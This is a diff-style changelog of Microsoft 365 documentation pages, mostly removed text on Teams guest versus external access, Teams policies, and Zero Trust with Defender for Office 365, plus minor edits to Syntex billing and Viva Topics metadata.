-## Guest and external access for Teams
-
-Microsoft Teams defines the following access types:
--- **Guest access** uses a Microsoft Entra B2B account for a guest or external user that can be added as a member of a team and have all permissioned access to the communication and resources of the team.--- **External access** is for an external user that doesn't have a Microsoft Entra B2B account. External access can include invitations and participation in calls, chats, and meetings, but doesn't include team membership and access to the resources of the team.-
-Conditional Access policies only apply to guest access in Teams because there's a corresponding Microsoft Entra B2B account.
-
-<!--
-In Azure AD, guest and external users are the same. The user type for both of these is Guest. Guest users are B2B users. Microsoft Teams differentiates between guest users and external users in the app. While it's important to understand how each of these are treated in Teams, both types of users are B2B users in Azure AD and the recommended policies for B2B users apply to both.
->-
-For recommended policies to allow access for guest and external users with a Microsoft Entra B2B account, see [Policies for allowing guest and external B2B account access](zero-trust-identity-device-access-policies-guest-access.md).
-
-### Guest access in Teams
-
-In addition to the policies for users who are internal to your business or organization, administrators may enable guest access to allow, on a user-by-user basis, people who are external to your business or organization to access Teams resources and interact with internal people for things like group conversations, chat, and meetings.
-
-For more information about guest access and how to implement it, see [Teams guest access](/microsoftteams/guest-access).
-
-### External access in Teams
-
-External access is sometimes confused with guest access, so it's important to be clear that these two non-internal access mechanisms are different types of access.
-
-External access is a way for Teams users from an entire external domain to find, call, chat, and set up meetings with your users in Teams. Teams administrators configure external access at the organization level. For more information, see [Manage external access in Microsoft Teams](/microsoftteams/manage-external-access).
-
-External access users have less access and functionality than an individual who's been added via guest access. For example, external access users can chat with your internal users with Teams but can't access team channels, files, or other resources.
-
-External access doesn't use Microsoft Entra B2B user accounts and therefore doesn't use Conditional Access policies.
-
-## Teams policies
-
-Outside of the common policies listed above, there are Teams-specific policies that can and should be configured to manage various Teams functionalities.
-
-### Teams and channels policies
-
-Teams and channels are two commonly used elements in Microsoft Teams, and there are policies you can put in place to control what users can and can't do when using teams and channels. While you can create a global team, if your organization has 5000 users or less, you're likely to find it helpful to have smaller teams and channels for specific purposes, in-line with your organizational needs.
-
-Changing the default policy or creating custom policies would be recommended, and you can learn more about managing your policies at this link: [Manage teams policies in Microsoft Teams](/microsoftteams/teams-policies).
-
-### Messaging policies
-
-Messaging, or chat, can also be managed through the default global policy, or through custom policies, and this can help your users communicate with one another in a way that's appropriate for your organization. This information can be reviewed at [Managing messaging policies in Teams](/microsoftteams/messaging-policies-in-teams).
-
-### Meeting policies
-
-No discussion of Teams would be complete without planning and implementing policies around Teams meetings. Meetings are an essential component of Teams, allowing people to formally meet and present to many users at once, and to share content relevant to the meeting. Setting the right policies for your organization around meetings is essential.
-
-For more information, review [Manage meeting policies in Teams](/microsoftteams/meeting-policies-in-teams).
-
-### App permission policies
-
-Teams also allows you to use apps in various places, such as channels or personal chats. Having policies around what apps can be added and used, and where, is essential to maintaining a content-rich environment that is also secure.
-
-For more reading about App Permission Policies, check out [Manage app permission policies in Microsoft Teams](/microsoftteams/teams-app-permission-policies).
-
-## Next steps
--
-Configure Conditional Access policies for:
--- [Exchange Online](zero-trust-identity-device-access-policies-exchange.md)-- [SharePoint](zero-trust-identity-device-access-policies-sharepoint.md)
security Zero Trust With Microsoft 365 Defender Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-with-microsoft-365-defender-office-365.md
- Title: Zero Trust with Microsoft Defender for Office 365
-description: Microsoft Defender for Office 365 contributes to a strong Zero Trust strategy and architecture
-
- - NOCSH
----
- - m365-security
- - tier1
- - zerotrust-services
Previously updated : 10/5/2023-
-adobe-target: true
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# Zero Trust with Microsoft Defender for Office 365
--
-Microsoft Defender for Office 365 is a cloud-based email filtering service that helps protect your organization against advanced threats to email and collaboration tools (for example, phishing, business email compromise, and malware attacks). Defender for Office 365 also provides investigation, Threat Hunting, and remediation capabilities to help security teams efficiently identify, prioritize, investigate, and respond to threats.
-
-[Zero Trust](/security/zero-trust/zero-trust-overview) is a security strategy for designing and implementing the following set of security principles:
-
-|Verify explicitly|Use least privilege access|Assume breach|
-||||
-|Always authenticate and authorize based on all available data points.|Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.|Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.|
-
-Defender for Office 365 is a primary component of the **Assume breach** principle and an important element of your extended detection and response (XDR) deployment with Microsoft Defender XDR. Defender for Office 365 consists of three levels of protection based on your subscription level and starts with built-in Exchange Online Protection (EOP). EOP is present in any Microsoft 365 subscription where there are Exchange Online mailboxes.
-
-|Protection level|Description|
-|||
-|EOP|Prevents broad, volume-based, known attacks.|
-|Defender for Office 365 P1|Protects email and collaboration from zero-day malware, phish, and business email compromise.|
-|Defender for Office 365 P2|Adds post-breach investigation, hunting, and response, as well as automation, and simulation (for training).|
-
-## Threat protection for Zero Trust
-
-The Defender for Office 365 protection or filtering stack can be broken out into four phases:
-
-1. **Edge protection**: Edge blocks are designed to be automatic. For false positives, senders are notified and told how to address their issue. Connectors from trusted partners with limited reputation can ensure deliverability, or temporary overrides can be put in place, when onboarding new endpoints.
-2. **Sender intelligence**: Critical for catching spam, bulk, impersonation, and unauthorized spoof messages, and also factor into phish detection.
-3. **Content filtering**: The filtering stack begins to handle the specific contents of the mail, including its hyperlinks and attachments.
-4. **Post-delivery protection**: After mail or file delivery, acting on mail that is in various mailboxes and files and links that appear in clients like Microsoft Teams.
-
-The Defender for Office 365 is also secure by default by quarantining email with suspected malware and using anti-spam policies to handle email with a high suspicion of phishing.
-
-## Next steps
-
-Learn how to set up your SecOps team with the [Microsoft Defender for Office 365 Security Operations Guide](mdo-sec-ops-guide.md).
-
-Learn more about Zero Trust and how to build an enterprise-scale strategy and architecture with the [Zero Trust Guidance Center](/security/zero-trust).
-
-Learn about other Microsoft 365 capabilities that contribute to a strong Zero Trust strategy and architecture with [Zero Trust deployment plan with Microsoft 365](../microsoft-365-zero-trust.md).
-
-For an overview of Zero Trust for Microsoft Defender XDR services, see [Zero Trust with Microsoft Defender XDR](../defender/zero-trust-with-microsoft-365-defender.md).
syntex Syntex Azure Billing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/syntex/syntex-azure-billing.md
For information about how to create an Azure subscription, see [Create your init
For information about how to create an Azure resource group, see [Manage Azure resource groups by using the Azure portal](/azure/azure-resource-manager/management/manage-resource-groups-portal).
-## Set up Microsoft Syntex billing in Azure
+## Connect Syntex to an Azure subscription for billing
When you set up Microsoft Syntex billing in Azure, events will be sent to the Azure meter in your account, and you'll be able to view the pages processed for unstructured and prebuilt document processing models.
The following permissions are required to set up Microsoft Syntex billing:
- You must have Global Administrator or SharePoint Administrator permissions to be able to access the Microsoft 365 admin center and set up Syntex. - You must have owner or contributor rights to the Azure subscription that you want to use for Microsoft Syntex billing.
-To configure Microsoft Syntex billing
+To configure Microsoft Syntex billing, follow these steps:
1. In the Microsoft 365 admin center, select <a href="https://go.microsoft.com/fwlink/p/?linkid=2171997" target="_blank">**Setup**</a>, and then view the **Files and content** section.
The following Microsoft Syntex products are currently available:
- Content assembly - Image tagging - Taxonomy tagging-- Translation
+- Document translation
- Syntex eSignature - Optical character recognition - Microsoft 365 Archive (Preview)
topics Adoption Resources https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/topics/adoption-resources.md
- m365initiative-viva-topics - Tier1--+ search.appverid: - MET150 ms.localizationpriority: medium
topics Plan Topic Experiences https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/topics/plan-topic-experiences.md
- m365initiative-viva-topics - Tier1--+ search.appverid: - MET150 ms.localizationpriority: medium
topics Topics Adoption Getstarted https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/topics/topics-adoption-getstarted.md
- m365initiative-viva-topics - Tier1--+ search.appverid: - MET150 ms.localizationpriority: medium
topics Trial Topics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/topics/trial-topics.md
- m365initiative-viva-topics - Tier1--+ search.appverid: - MET150 ms.localizationpriority: medium